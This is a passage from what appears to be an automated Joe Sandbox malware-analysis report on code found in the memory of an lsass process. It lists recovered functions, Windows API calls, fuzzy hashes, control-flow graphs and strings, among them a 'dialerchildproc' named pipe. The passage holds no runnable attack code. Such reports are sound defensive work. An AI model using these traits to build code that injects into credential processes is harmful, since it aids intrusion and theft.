2d6f151abf8-2d6f151ac1e call 2d6f151a128 call 2d6f151b068 492->520 521 2d6f151ac34-2d6f151ac3a 492->521 499 2d6f151acb4 493->499 503 2d6f151ad33-2d6f151ad3d call 2d6f151b8dc 494->503 495->503 499->484 503->453 518 2d6f151ad43-2d6f151ad91 call 2d6f1519d74 call 2d6f1519f80 503->518 507->447 524 2d6f151aa84-2d6f151aaa4 call 2d6f1519a64 * 2 call 2d6f151b8dc 507->524 508->507 512 2d6f151aa60-2d6f151aa6b 508->512 512->507 517 2d6f151aa6d-2d6f151aa72 512->517 517->443 517->507 518->453 540 2d6f151ac20-2d6f151ac32 520->540 541 2d6f151ac45-2d6f151aca2 call 2d6f151a8a0 520->541 525 2d6f151ac3c-2d6f151ac40 521->525 526 2d6f151acab 521->526 545 2d6f151aaa6-2d6f151aab0 call 2d6f151b9cc 524->545 546 2d6f151aabb 524->546 525->492 531 2d6f151acb0 526->531 531->499 540->520 540->521 541->531 549 2d6f151aab6-2d6f151ae1f call 2d6f15196dc call 2d6f151b424 call 2d6f15198d0 545->549 550 2d6f151ae20-2d6f151ae25 call 2d6f151cad8 545->550 546->447 549->550 550->490
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 849930591-393685449
                                                          • Opcode ID: 97224decaf04aa8a96cad19aafa8d0fc2d444fbfe93f120d80d8953d06d5a995
                                                          • Instruction ID: 8bd4ce2d5a4f6d73ed0f55f0107dccffaaa78187669bcc93e1a79a3ab942d4f8
                                                          • Opcode Fuzzy Hash: 97224decaf04aa8a96cad19aafa8d0fc2d444fbfe93f120d80d8953d06d5a995
                                                          • Instruction Fuzzy Hash: F8E14CB2604F808EEB229FA5E44839D77A4F745BD8F144517EE8E67B99CB38C991C700
                                                          Function 000002D6F151F7C4 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 560 2d6f151f7c4-2d6f151f816 561 2d6f151f907 560->561 562 2d6f151f81c-2d6f151f81f 560->562 565 2d6f151f909-2d6f151f925 561->565 563 2d6f151f829-2d6f151f82c 562->563 564 2d6f151f821-2d6f151f824 562->564 566 2d6f151f8ec-2d6f151f8ff 563->566 567 2d6f151f832-2d6f151f841 563->567 564->565 566->561 568 2d6f151f851-2d6f151f870 LoadLibraryExW 567->568 569 2d6f151f843-2d6f151f846 567->569 570 2d6f151f926-2d6f151f93b 568->570 571 2d6f151f876-2d6f151f87f GetLastError 568->571 572 2d6f151f946-2d6f151f955 GetProcAddress 569->572 573 2d6f151f84c 569->573 570->572 574 2d6f151f93d-2d6f151f940 FreeLibrary 570->574 576 2d6f151f8c6-2d6f151f8d0 571->576 577 2d6f151f881-2d6f151f898 call 2d6f151cd58 571->577 578 2d6f151f957-2d6f151f97e 572->578 579 2d6f151f8e5 572->579 575 2d6f151f8d8-2d6f151f8df 573->575 574->572 575->567 575->579 576->575 577->576 582 2d6f151f89a-2d6f151f8ae call 2d6f151cd58 577->582 578->565 579->566 582->576 585 2d6f151f8b0-2d6f151f8c4 LoadLibraryExW 582->585 585->570 585->576
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeLibraryProc
                                                          • String ID: api-ms-$ext-ms-
                                                          • API String ID: 3013587201-537541572
                                                          • Opcode ID: 00167ab4370d744fa0294c6334099228d3e91a4042df4aa134bc83b99d5d7789
                                                          • Instruction ID: 79254f32f3b6e32fc6b4e35625dee29fad6023e8c082d9260ff16057696211fb
                                                          • Opcode Fuzzy Hash: 00167ab4370d744fa0294c6334099228d3e91a4042df4aa134bc83b99d5d7789
                                                          • Instruction Fuzzy Hash: 0741A1A2311E50A9EB1BDF26B84C7556396BB45BE0F4841279D0F67B94EB3CCC498340
                                                          Function 000002D6F151104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                          • String ID: d
                                                          • API String ID: 3743429067-2564639436
                                                          • Opcode ID: 4fe3aae0cbb599a1eee1f2be40b2bdf186d2f5bad4b5f62f31428b11ea11a368
                                                          • Instruction ID: ff6e951b7c38a8a75e43e205a700e730673afc4ee2af2b0ae6d412e1c43807d8
                                                          • Opcode Fuzzy Hash: 4fe3aae0cbb599a1eee1f2be40b2bdf186d2f5bad4b5f62f31428b11ea11a368
                                                          • Instruction Fuzzy Hash: 50414F73214F80CAEB51CF61E44879AB7A1F388B98F048116DA8A17B58DF3CD849CB00
                                                          Function 000002D6F151D498 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • FlsGetValue.KERNEL32(?,?,?,000002D6F151CC0E,?,?,?,?,?,?,?,?,000002D6F151D3CD,?,?,00000001), ref: 000002D6F151D4B7
                                                          • FlsSetValue.KERNEL32(?,?,?,000002D6F151CC0E,?,?,?,?,?,?,?,?,000002D6F151D3CD,?,?,00000001), ref: 000002D6F151D4D6
                                                          • FlsSetValue.KERNEL32(?,?,?,000002D6F151CC0E,?,?,?,?,?,?,?,?,000002D6F151D3CD,?,?,00000001), ref: 000002D6F151D4FE
                                                          • FlsSetValue.KERNEL32(?,?,?,000002D6F151CC0E,?,?,?,?,?,?,?,?,000002D6F151D3CD,?,?,00000001), ref: 000002D6F151D50F
                                                          • FlsSetValue.KERNEL32(?,?,?,000002D6F151CC0E,?,?,?,?,?,?,?,?,000002D6F151D3CD,?,?,00000001), ref: 000002D6F151D520
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Value
                                                          • String ID: 1%$Y%
                                                          • API String ID: 3702945584-1395475152
                                                          • Opcode ID: 414de4670033e7547a0a5b3bdda6d862915786416a62f5675f2ee32494ca94ec
                                                          • Instruction ID: 34fff18819220c53d17335b28181365dbf6ab4e02b52f8033893f198ed7e02b2
                                                          • Opcode Fuzzy Hash: 414de4670033e7547a0a5b3bdda6d862915786416a62f5675f2ee32494ca94ec
                                                          • Instruction Fuzzy Hash: 451190E1305E404AFA5AAF32B58D7796242AB843F4F544327A83F27FD6DE6CCC028600
                                                          Function 000002D6F1512334 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                          • String ID: \\.\pipe\dialerchildproc
                                                          • API String ID: 166002920-1933775637
                                                          • Opcode ID: 46ac6f3595cd08ba72cfe16ac14249d71bcf4bf6cdab2aa291378c72e2095538
                                                          • Instruction ID: d4c8c24966d39016955a1db9846a553d2bea095b48411aa5f7967032cc521d0f
                                                          • Opcode Fuzzy Hash: 46ac6f3595cd08ba72cfe16ac14249d71bcf4bf6cdab2aa291378c72e2095538
                                                          • Instruction Fuzzy Hash: 081104B6618B8086E7108B21F40C75A6771F389BE5F544316EA9E06EA8CF7CC949CB00
                                                          Function 000002D6F1517940 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID:
                                                          • API String ID: 190073905-0
                                                          • Opcode ID: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                          • Instruction ID: e207afeac99c483b23ca70e1e15b51e9258d1619311ba5b43c5831fe42b5bb13
                                                          • Opcode Fuzzy Hash: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                          • Instruction Fuzzy Hash: 0181E5E2600E414EFB66AF6EB88D35922D1A7957C0F144017AA4F67F97EB7CCD468700
                                                          Function 000002D6F151A1F4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(?,?,?,000002D6F151A3B3,?,?,?,000002D6F1519B9C,?,?,?,?,000002D6F15196BD), ref: 000002D6F151A279
                                                          • GetLastError.KERNEL32(?,?,?,000002D6F151A3B3,?,?,?,000002D6F1519B9C,?,?,?,?,000002D6F15196BD), ref: 000002D6F151A287
                                                          • LoadLibraryExW.KERNEL32(?,?,?,000002D6F151A3B3,?,?,?,000002D6F1519B9C,?,?,?,?,000002D6F15196BD), ref: 000002D6F151A2B1
                                                          • FreeLibrary.KERNEL32(?,?,?,000002D6F151A3B3,?,?,?,000002D6F1519B9C,?,?,?,?,000002D6F15196BD), ref: 000002D6F151A2F7
                                                          • GetProcAddress.KERNEL32(?,?,?,000002D6F151A3B3,?,?,?,000002D6F1519B9C,?,?,?,?,000002D6F15196BD), ref: 000002D6F151A303
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                          • String ID: api-ms-
                                                          • API String ID: 2559590344-2084034818
                                                          • Opcode ID: c60201aec778344204bcef1649fbeec24da53dc38ebde7e62b727d681ed7f771
                                                          • Instruction ID: cd56abd0b15b46bfa7f6e75feb324c8a2dbd782cc1bfc98f481b084187e69c1c
                                                          • Opcode Fuzzy Hash: c60201aec778344204bcef1649fbeec24da53dc38ebde7e62b727d681ed7f771
                                                          • Instruction Fuzzy Hash: C231A562312ED099EE17DF96B80C7952394B748BE0F5905279D2F27B91EF3DD9458300
                                                          Function 000002D6F15241E4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                          • String ID: CONOUT$
                                                          • API String ID: 3230265001-3130406586
                                                          • Opcode ID: 825ce686359a22e25232def11d6f08b48dee252c530cecc749e4dc9d381a3549
                                                          • Instruction ID: 143dbac3a442536613272f400a2b94a61a41b1b27845f89f55d1593b6f4161ce
                                                          • Opcode Fuzzy Hash: 825ce686359a22e25232def11d6f08b48dee252c530cecc749e4dc9d381a3549
                                                          • Instruction Fuzzy Hash: 98115BA2210E808AE7908B52F88C71966A4F799BE4F144226EE5F87B94CF3CC8148740
                                                          Function 000002D6F1513BC0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModule
                                                          • String ID: wr
                                                          • API String ID: 1092925422-2678910430
                                                          • Opcode ID: 1983e7b2aaee179c95f49a9ecb428acdca8d3318c5669cc08ca5f07c1a06eaeb
                                                          • Instruction ID: 03de86d683a12fb17ccc59ee8c9ece19a0ba9433239c681a6c7baa4ec7ae2cf7
                                                          • Opcode Fuzzy Hash: 1983e7b2aaee179c95f49a9ecb428acdca8d3318c5669cc08ca5f07c1a06eaeb
                                                          • Instruction Fuzzy Hash: CD115EA6704B808AEB559F26F45C2696275FB48BD4F14442ADE8E07B54EF3DC944C708
                                                          Function 000002D6F1515F60 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Thread$Current$Context
                                                          • String ID:
                                                          • API String ID: 1666949209-0
                                                          • Opcode ID: 6eebb9b89febcdc057b9e2366de4ef2aabdd815d2606de48d9a359409e558620
                                                          • Instruction ID: fe096de8faa0c72c89be56b2c7d76b0fc97ac365f8a7fb52167edee8a6af2a22
                                                          • Opcode Fuzzy Hash: 6eebb9b89febcdc057b9e2366de4ef2aabdd815d2606de48d9a359409e558620
                                                          • Instruction Fuzzy Hash: D3D18AB6204F8889DA719F1AF49935A77A1F388BC4F500116EACE57BA5CF7CC941CB40
                                                          Function 000002D6F15131CC Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID: dialer
                                                          • API String ID: 756756679-3528709123
                                                          • Opcode ID: b0319cbd86f06d073dcced0acdf6bc1c6042bb64f80e9fc0b828a3d11e191795
                                                          • Instruction ID: cb24b82235290dcfeaa1a5b5c86bc8f3020527c4d096cae8eb02b05cfc284e48
                                                          • Opcode Fuzzy Hash: b0319cbd86f06d073dcced0acdf6bc1c6042bb64f80e9fc0b828a3d11e191795
                                                          • Instruction Fuzzy Hash: 6A31BFA2701F918AEB92EF56F45C7A963A0BB54BD0F0840268E5E13F55EF3CD865C300
                                                          Function 000002D6F151D3D0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,?,000002D6F151DAE5,?,?,?,?,000002D6F151DBA8), ref: 000002D6F151D3DF
                                                          • FlsSetValue.KERNEL32(?,?,?,000002D6F151DAE5,?,?,?,?,000002D6F151DBA8), ref: 000002D6F151D415
                                                          • FlsSetValue.KERNEL32(?,?,?,000002D6F151DAE5,?,?,?,?,000002D6F151DBA8), ref: 000002D6F151D442
                                                          • FlsSetValue.KERNEL32(?,?,?,000002D6F151DAE5,?,?,?,?,000002D6F151DBA8), ref: 000002D6F151D453
                                                          • FlsSetValue.KERNEL32(?,?,?,000002D6F151DAE5,?,?,?,?,000002D6F151DBA8), ref: 000002D6F151D464
                                                          • SetLastError.KERNEL32(?,?,?,000002D6F151DAE5,?,?,?,?,000002D6F151DBA8), ref: 000002D6F151D47F
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Value$ErrorLast
                                                          • String ID:
                                                          • API String ID: 2506987500-0
                                                          • Opcode ID: 7fc5e4c2f951738899047b95e00f4424a4026db9f78df7ad039e65ab4a94a20b
                                                          • Instruction ID: 8506cdb58421c1a2dc0f91b69b68bb360fa35a484a2193f2d54768caec376632
                                                          • Opcode Fuzzy Hash: 7fc5e4c2f951738899047b95e00f4424a4026db9f78df7ad039e65ab4a94a20b
                                                          • Instruction Fuzzy Hash: F81172E5345E804AFA5AAB32768D36962526B447F0F140727983F27FD6DEECEC028600
                                                          Function 000002D6F1511934 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                          • String ID:
                                                          • API String ID: 517849248-0
                                                          • Opcode ID: b82d1bbac2a4a5b9d6dbe5f2df15dcec51c980f52b633491719cdad5f7bdf37e
                                                          • Instruction ID: 5fe1c14b9eb4ede84857b937708227874442c3c06e68d1dba0401947e5a09b33
                                                          • Opcode Fuzzy Hash: b82d1bbac2a4a5b9d6dbe5f2df15dcec51c980f52b633491719cdad5f7bdf37e
                                                          • Instruction Fuzzy Hash: 1E0129A2704E808AEB14DB22B89C75963A1F788FC1F584136DE9E43B54DF3CC989C744
                                                          Function 000002D6F1513B0C Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                          • String ID:
                                                          • API String ID: 449555515-0
                                                          • Opcode ID: 8662155c9f7376030badf6deb1f9cc8df7edcdadcbb5a73039a50034e0df76dd
                                                          • Instruction ID: b25aeba175a1d52ce49f39f024d222154bdf59954bbbc389921beefab7ebde51
                                                          • Opcode Fuzzy Hash: 8662155c9f7376030badf6deb1f9cc8df7edcdadcbb5a73039a50034e0df76dd
                                                          • Instruction Fuzzy Hash: 96014CA6611F848AEB659F22F85D71973B1BB48BD5F04052ACD4E07B64EF3DC8498704
                                                          Function 000002D6F1519418 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                          • String ID: csm$f
                                                          • API String ID: 2395640692-629598281
                                                          • Opcode ID: 124d9c0b905e6e6f2e62f9bd05bcfd16d2c666ef5833f5a39d15387171bb82e0
                                                          • Instruction ID: 7aaeb7a1e61166fbc537c925b5fae37ebf0e7ad427beefa535fed541ff56aab3
                                                          • Opcode Fuzzy Hash: 124d9c0b905e6e6f2e62f9bd05bcfd16d2c666ef5833f5a39d15387171bb82e0
                                                          • Instruction Fuzzy Hash: 2E519CB2601A408EEB26CF25F45CB593795F740BCCF5281269E4B63B88EB39CD81C700
                                                          Function 000002D6F14E8835 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 135COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
